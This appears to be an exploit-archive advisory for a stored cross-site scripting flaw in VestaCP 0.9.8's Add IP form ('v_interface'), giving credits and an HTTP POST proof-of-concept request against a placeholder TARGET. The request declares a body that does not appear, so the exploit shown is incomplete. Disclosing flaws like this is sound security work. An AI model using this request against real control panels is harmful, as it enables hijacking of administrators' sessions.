VestaCP 0.9.8 Cross Site Scripting

VestaCP version 0.9.8 suffers from a persistent cross site scripting vulnerability. Original discovery of persistent cross site scripting was discovered in this version in February of 2016 by Necmettin COSKUN.

MD5 | cab58700522938c23e6459b259e06362

# Title: VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS
# Date: 07.03.2021
# Author: Numan Türle
# Vendor Homepage:
# Software Link: < 0.9.8-26-43
# Software Link: < 0.9.8-26
# Tested on: VestaCP

POST /add/ip/ HTTP/1.1
Host: TARGET:8083
Connection: close
Content-Length: 165
Cache-Control: max-age=0
Origin: https://TARGET:8083
Content-Type: application/x-www-form-urlencoded
User-Agent: USER-AGENT
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://TARGET:8083/add/ip/
Accept-Encoding: gzip, deflate
Accept-Language: en,tr-TR;
Cookie: PHPSESSID=udiudv2k0707d6k3p3fi1n1qk0
sec-gpc: 1


Related Posts